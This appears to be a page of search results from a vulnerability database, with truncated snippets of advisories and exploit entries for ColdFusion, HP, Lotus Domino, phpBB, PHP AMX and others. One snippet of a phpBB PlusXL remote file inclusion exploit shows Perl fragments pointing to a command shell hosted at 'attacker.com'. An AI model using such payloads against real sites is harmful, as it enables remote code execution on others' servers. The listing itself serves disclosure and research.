2073 matches found
PT-2013-1353 · Adobe · Coldfusion
Name of the Vulnerable Software and Affected Versions: Adobe ColdFusion versions 9.0 through 10 Description: The issue is related to the administrator.cfc component in Adobe ColdFusion, which allows remote attackers to bypass authentication and possibly execute arbitrary code. This is achieved by...
HP Diagnostics Server magentservice.exe Integer Wrap
Added: 01/26/2012 CVE: CVE-2011-4789 BID: 51398 OSVDB: 78309 Background HP Diagnostics software monitors application transaction health in traditional, virtualized and cloud environments. Problem A vulnerability exists in the way the magentservice.exe service handles network requests. Subtraction...
Lotus Domino HPRAgentName Stack Overflow
Added: 07/08/2011 Background IBM Lotus Domino is a messaging and collaboration solution for multiple platforms. Problem The WebAdmin.nsf resource on the Domino web service contains a buffer overflow vulnerability. Resolution No patch is available at this time. References Limitations This exploit...
VMware 2 Web Server Directory Traversal Vulnerability (Windows)
This host is installed with VMware 2 Web Server and is prone to directory traversal vulnerability. OpenVAS Vulnerability Test $Id: gbvmwarewebserverdirtravvulnwin.nasl 6518 2017-07-04 13:49:06Z cfischer $ VMware 2 Web Server Directory Traversal Vulnerability Windows Authors: Sooraj KS Copyright:...
TortoiseSVN Insecure Library Loading Vulnerability
This host is installed with TortoiseSVN and is prone to insecure library loading vulnerability. OpenVAS Vulnerability Test $Id: gbtortoisesvninsecurelibloadvuln.nasl 8169 2017-12-19 08:42:31Z cfischer $ TortoiseSVN Insecure Library Loading Vulnerability Authors: Sooraj KS Copyright: Copyright c...
DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability
Title ----- DDIVRT-2009-27 F2L-3000 files2links SQL Injection Vulnerability Severity -------- Medium Date Discovered --------------- November 19, 2009 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Rob Kraus, Chris Graham and r@b13$ Vulnerability Description...
Anti-Trojan Elite和Anti-Keylogger Elite IOCTL请求本地权限提升漏洞
BUGTRAQ ID: 32202 Anti-Trojan Elite和Anti-Keylogger Elite是ISecSoft推出的防木马和侦测键盘记录器工具。 Anti-Keylogger Elite的AKEProtect.sys驱动没有正确地验证通过IOCTL 0x002224A4、0x002224C0和0x002224CC所接收到的参数,Anti-Trojan Elite的Atepmon.sys驱动没有正确地验证通过IOCTL 0x00222494所接收到的参数,本地管理员启动Anti Trojan Elite或Anti-Keylogger...
Multiple vulnerabilities in HP OpenView NNM 7.53
Luigi Auriemma Application: HP OpenView Network Node Manager http://www.openview.hp.com/products/nnm/ Versions: = 7.53 Platforms: Windows tested, Solaris, Linux, HP-UX Bugs: A format string in ovalarmsrv B multiple buffer-overflows in ovalarmsrv C Denial of Service in ovalarmsrv Exploitation:...
Hamachi Password Disclosure Vulnerability
Hamachi VPN Client 1.0.2.5 Password Disclosure Vulnerability 1 Infos --------- Date : 2008-03-24 Product : Hamachi VPN Client 1.0.2.5 Version : 1.0.2.5 Vendor : www.hamachi.it/ Vendor Status : 2008-03-24 - Not Informed Discovered/Provided By : Giuseppe Evilcry Bonfa' - http://evilcry.altervista.o...
RunCMS Common.PHP本地文件包含漏洞
RunCMS Common.PHP Local File Include Vulnerability RunCMS是一款基于PHP的WEB应用程序。 RunCMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。 问题是由于'Common.PHP'脚本对用户提交的WEB参数缺少过滤,提交包含多个"../"字符作为参数数据,可绕过WEB ROOT限制,以WEB权限查看系统文件内容。 RunCMS RunCMS 1.5.3 RunCMS RunCMS 1.5.2 Build 20070504 RunCMS RunCMS 1.5.2 RunCMS RunCMS...
PT-2007-4630 · Myevent · Myevent
Name of the Vulnerable Software and Affected Versions: MyEvent version 1.6 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the myevent path parameter in the includes/template.php file. A reliable third party disputes this issue, stating that the entire fi...
PT-2007-2135 · Extcalendar · Extcalendar
Name of the Vulnerable Software and Affected Versions: ExtCalendar versions 2 and earlier Description: The issue allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions, via modified values to...
PT-2006-6665 · My-Bic · My-Bic
Name of the Vulnerable Software and Affected Versions: My-BIC version 0.6.5 Description: A remote file inclusion issue in mybic server.php allows remote attackers to execute arbitrary PHP code via a URL in the INC PATH parameter. This issue is disputed by third-party researchers because INC PATH ...
PT-2006-6517 · Speedywiki · Speedywiki
Name of the Vulnerable Software and Affected Versions: Speedywiki version 2.0 Description: A cross-site scripting XSS issue exists, allowing remote attackers to inject arbitrary web script or HTML. This is achieved via the showRevisions parameter in the "index.php" file. Recommendations: For...
phpBB Add Name Remote File Include Vulnerability
No description provided by source. !/usr/bin/perl phpBB Add Name Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...
phpbbplusxl-rfi.txt
!/usr/bin/perl phpBB PlusXL 2.X biuld 272 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.xs4all.nl/hkicken/plusxl.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socke...
Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= Php AMX 0.90 plugins/main.php Remote File Include Vulnerability ================================================================= phpamx 0.90 Class: Remote|Local File Includ...
PHP AMX 0.90 - pluginsmain.php Remote File Inclusion
PHP AMX 0.90 - pluginsmain.php Remote File Inclusion phpamx 0.90 Class: Remote|Local File Include Vulnerability Patch: Unavailable Published 2006/10/18 Remote: Yes Local: No Type: High Site: http://sourceforge.net/projects/phpamx/ Author: MP Contact: [email protected] Vuln Code...
Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability
No description provided by source. phpamx 0.90 Class: Remote|Local File Include Vulnerability Patch: Unavailable Published 2006/10/18 Remote: Yes Local: No Type: High Site: http://sourceforge.net/projects/phpamx/ Author: MP Contact: [email protected] Vuln Code php/plugins/main.php: ?php...
phpBB SpamOborona Mod 1.0b - Remote File Inclusion
phpBB SpamOborona Mod 1.0b - Remote File Inclusion !/usr/bin/perl SpamOborona PHPBB Plugin Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...